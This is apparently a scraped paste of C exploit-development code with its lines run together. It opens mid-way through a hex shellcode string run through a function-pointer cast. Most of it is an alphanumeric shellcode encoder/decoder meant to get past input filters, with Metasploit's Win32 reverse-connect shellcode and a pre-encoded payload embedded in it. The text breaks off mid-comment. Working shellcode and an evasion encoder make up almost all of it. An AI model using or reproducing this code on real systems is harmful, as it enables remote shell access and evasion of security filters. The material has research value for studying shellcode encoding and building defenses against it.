35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4
f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  4. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 
2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... 
#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct 
xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. 
address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. 
| int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. 
| | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? 
(this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. 
| | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec 
esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. 
| | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 
= 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | 
decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | 
*(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for 